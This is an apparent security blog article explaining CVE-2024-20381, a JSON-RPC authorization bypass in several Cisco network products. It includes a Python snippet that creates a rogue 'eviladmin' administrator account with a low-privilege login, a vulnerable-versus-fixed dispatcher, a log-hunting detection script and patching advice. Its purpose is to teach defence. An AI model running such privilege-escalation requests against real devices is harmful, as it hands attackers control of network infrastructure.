In September 2024, Cisco disclosed CVE-2024-20381, a high-severity (Cisco SIR: High) authorization bypass affecting several Cisco products. The flaw is in the JSON-RPC API used by the web-based management interfaces of Cisco Crosswork Network Services Orchestrator (NSO), Cisco ConfD, Cisco Optical Site Manager, and Cisco RV340 Dual WAN Gigabit VPN Routers.
Let’s break down what this flaw means, how attackers could use it, where the risk is, and what you can do to stay safe. We’ll use short code snippets and refer to the official Cisco advisory, keeping everything clear and practical.
What is CVE-2024-20381?
CVE-2024-20381 is caused by insufficient authorization checks on JSON-RPC API endpoints: the API verifies that the caller is logged in, but not that the caller’s role permits the requested operation. In simple terms, an attacker who already holds any valid credentials (even a basic, low-privilege user) can use the API to make configuration changes they should not be able to make, such as creating new administrator accounts or elevating the privileges of their own account.
> Official Cisco Advisory: Cisco Security Advisory: cisco-sa-nso-confd-jrpc-authzbyp-XvD6SHk
Step 1: Get Basic Access
The attacker starts by logging in with any valid account, even one with minimal privileges. Because this is an authorization bypass rather than an authentication bypass, this step is a genuine prerequisite: the attacker needs working credentials, however low their privilege.
Step 2: Send A Malicious JSON-RPC Call
The attacker crafts a JSON-RPC request that invokes a privileged operation. The endpoint confirms that the session is authenticated but never checks whether that session’s role is allowed to call the method, so the request is executed.
Sample malicious JSON-RPC call:
Here’s an example in Python using the requests library. It adds a new admin user on a hypothetical vulnerable device; the endpoint path and the method name are illustrative placeholders, not the real JSON-RPC method names of any of the affected products.
```python
import requests
import json

# Replace with the target device's IP and credentials
url = 'https://10...42/api/jsonrpc'  # hypothetical endpoint path
headers = {'Content-Type': 'application/json'}
auth = ('user', 'password')  # any valid credentials, even a low-privilege account
payload = {
    "jsonrpc": "2.0",
    "method": "system.user.add",  # hypothetical method name
    "params": {
        "username": "eviladmin",
        "password": "SuperSecret123!",
        "privilege": "admin"
    },
    "id": 1
}
# verify=False disables TLS certificate validation; only acceptable in a lab against a self-signed device certificate
response = requests.post(url, headers=headers, auth=auth, data=json.dumps(payload), verify=False)
print(response.status_code, response.text)
```
What happens?
Because the API does not compare the caller’s role against the privilege the method requires, a low-privilege user can create a new administrator account called eviladmin, or raise their own account to administrator.
Impact
- Privilege escalation: a basic user becomes an administrator of the device or application.
- Persistence: the attacker can create hidden backdoor accounts for future access.
- In an enterprise environment, this can mean total loss of control over the device and the network it manages.
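To make the root cause concrete, here is an added example (not code from this article or from Cisco) of a minimal JSON-RPC dispatcher written twice: once in the vulnerable shape, where any authenticated session may call any method, and once hardened with a per-method authorization check against the server-side session role. The session table, role names, method names and the in-memory account store are all hypothetical; the request body is the same eviladmin payload used above.

```python
import json

# Constructed session table: who is logged in and which role the server assigned them.
# Tokens, usernames and roles are hypothetical, not taken from any Cisco product.
SESSIONS = {
    "tok-operator": {"user": "operator", "role": "operator"},
    "tok-admin": {"user": "root", "role": "admin"},
}

# Minimum role required per JSON-RPC method (hypothetical method names).
METHOD_ROLES = {
    "system.status": "operator",
    "system.user.add": "admin",
    "system.user.set_privilege": "admin",
}

ROLE_RANK = {"operator": 1, "admin": 2}

USERS = {}  # hypothetical backing store: username -> privilege level


def _error(req_id, code, message):
    return {"jsonrpc": "2.0", "id": req_id, "error": {"code": code, "message": message}}


def _execute(method, params):
    """Backend operations. They do no authorization of their own, so the dispatcher must."""
    if method == "system.status":
        return {"status": "ok"}
    if method == "system.user.add":
        USERS[params["username"]] = params["privilege"]
        return {"created": params["username"]}
    if method == "system.user.set_privilege":
        USERS[params["username"]] = params["privilege"]
        return {"updated": params["username"]}
    raise KeyError(method)


def dispatch_vulnerable(raw, token):
    """Vulnerable shape: authentication only, no per-method authorization."""
    req = json.loads(raw)
    if token not in SESSIONS:
        return _error(req.get("id"), -32001, "not authenticated")
    method = req.get("method")
    if method not in METHOD_ROLES:
        return _error(req.get("id"), -32601, "method not found")
    # Any logged-in session reaches here, including a low-privilege operator.
    return {"jsonrpc": "2.0", "id": req.get("id"), "result": _execute(method, req.get("params", {}))}


def dispatch_fixed(raw, token):
    """Hardened shape: authentication plus authorization against the server-side role."""
    req = json.loads(raw)
    session = SESSIONS.get(token)
    if session is None:
        return _error(req.get("id"), -32001, "not authenticated")
    method = req.get("method")
    required = METHOD_ROLES.get(method)
    if required is None:
        return _error(req.get("id"), -32601, "method not found")
    # The role comes from the session the server created at login, never from the request body,
    # so a caller cannot smuggle "privilege": "admin" past this check.
    if ROLE_RANK[session["role"]] < ROLE_RANK[required]:
        return _error(req.get("id"), -32002, "forbidden: %s requires role %s" % (method, required))
    return {"jsonrpc": "2.0", "id": req.get("id"), "result": _execute(method, req.get("params", {}))}


# Constructed request: the same payload the attacker sends in the article.
EVIL = json.dumps({
    "jsonrpc": "2.0",
    "method": "system.user.add",
    "params": {"username": "eviladmin", "password": "SuperSecret123!", "privilege": "admin"},
    "id": 1,
})

if __name__ == "__main__":
    print("vulnerable:", dispatch_vulnerable(EVIL, "tok-operator"))  # operator succeeds
    USERS.clear()
    print("fixed:     ", dispatch_fixed(EVIL, "tok-operator"))       # operator is refused
    print("fixed:     ", dispatch_fixed(EVIL, "tok-admin"))          # admin succeeds
```

The important design point is where the role comes from: the fixed dispatcher looks it up in the session the server created at login, so the only thing the request body can influence is which method is named, and that method is then checked against a server-side table.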
Affected Products
- Cisco Crosswork Network Services Orchestrator (NSO)
- Cisco ConfD
- Cisco Optical Site Manager
- Cisco RV340 Dual WAN Gigabit VPN Routers
*For a full list, always check the latest Cisco advisory.*
How to Fix or Protect Yourself
1. Patch/Update Immediately
Cisco has released fixes; download and apply them for all affected products. Check the Fixed Software section of the advisory for the exact release per product, and note that a product that has reached end-of-life may not receive a fix at all, in which case the remaining steps are your only controls.
- Cisco Software Downloads
- See the Cisco advisory for specifics.
2. Restrict Access to the Management Interface
Exploitation requires a login, so reduce who can reach the API in the first place: never expose the web-based management interface to the Internet, and limit it to a management network or VPN.
3. Review Accounts and Logs
Since the attack creates accounts or elevates privileges, look for administrator accounts you did not create and for privilege changes you cannot explain, and remove any that are not legitimate.
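Patching aside, the advice to review access is easier to act on with a script. The block below is an added example (not from this article or from Cisco) that walks a constructed JSON-RPC access log and flags two things a defender hunting for this abuse would want: privileged methods invoked by sessions that do not hold the admin role, and any call that grants admin privilege to an account outside a known-admin baseline. The log format, field names and method names are assumptions for this example, not a Cisco log format.

```python
import json
import re

# Constructed sample of a hypothetical JSON-RPC access log, one request per line.
# Format and method names are assumptions for this example, not a real product log.
SAMPLE_LOG = """\
2024-09-12T08:01:02Z user=operator role=operator method=system.status id=7
2024-09-12T08:01:09Z user=operator role=operator method=system.user.add id=8 params={"username":"eviladmin","privilege":"admin"}
2024-09-12T08:02:11Z user=root role=admin method=system.user.add id=9 params={"username":"backup-svc","privilege":"operator"}
2024-09-12T08:03:40Z user=eviladmin role=admin method=system.user.set_privilege id=10 params={"username":"operator","privilege":"admin"}
"""

# Methods that should only ever be called by an administrator (hypothetical names).
PRIVILEGED_METHODS = {"system.user.add", "system.user.set_privilege"}

LINE_RE = re.compile(
    r'^(?P<ts>\S+) user=(?P<user>\S+) role=(?P<role>\S+) method=(?P<method>\S+) id=(?P<id>\d+)'
    r'(?: params=(?P<params>.*))?$'
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = json.loads(rec["params"]) if rec["params"] else {}
    return rec


def find_suspicious(log_text, known_admins):
    """Return (finding, timestamp, caller, subject) tuples for two patterns:
    a privileged method called by a non-admin session, and an admin grant to
    an account that is not in the known_admins baseline."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] not in PRIVILEGED_METHODS:
            continue
        if rec["role"] != "admin":
            findings.append(("privileged_call_by_non_admin", rec["ts"], rec["user"], rec["method"]))
        if rec["params"].get("privilege") == "admin":
            target = rec["params"].get("username")
            if target not in known_admins:
                findings.append(("unexpected_admin_grant", rec["ts"], rec["user"], target))
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG, known_admins={"root"}):
        print(*finding)
```

Note that the third log line, an administrator creating an operator-level service account, produces no finding, while the fourth line, where the freshly created eviladmin account promotes another user, is caught by the baseline check even though its role field reads admin. The baseline is what catches the follow-on activity once the attacker already holds an admin session.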
Useful References
- Official Advisory: Cisco Security Advisory: cisco-sa-nso-confd-jrpc-authzbyp-XvD6SHk
- NIST NVD: CVE-2024-20381
- Cisco Software Downloads
- Python Requests Library: Official Docs
Conclusion
CVE-2024-20381 highlights the importance of proper per-operation authorization in network management APIs such as JSON-RPC. Authentication alone is not a control: an attacker who can log in with any account, however limited, can modify configuration and take over devices, putting entire infrastructures at risk.
Patch now, review your access, and never leave remote management interfaces open to the world!
*Stay safe. For more up-to-date security news, check Cisco’s security center.*
*This article is intended to help you understand and defend against real-world API vulnerabilities in modern network infrastructure.*
Timeline
Published on: 09/11/2024 17:15:12 UTC
Last modified on: 09/25/2024 17:15:15 UTC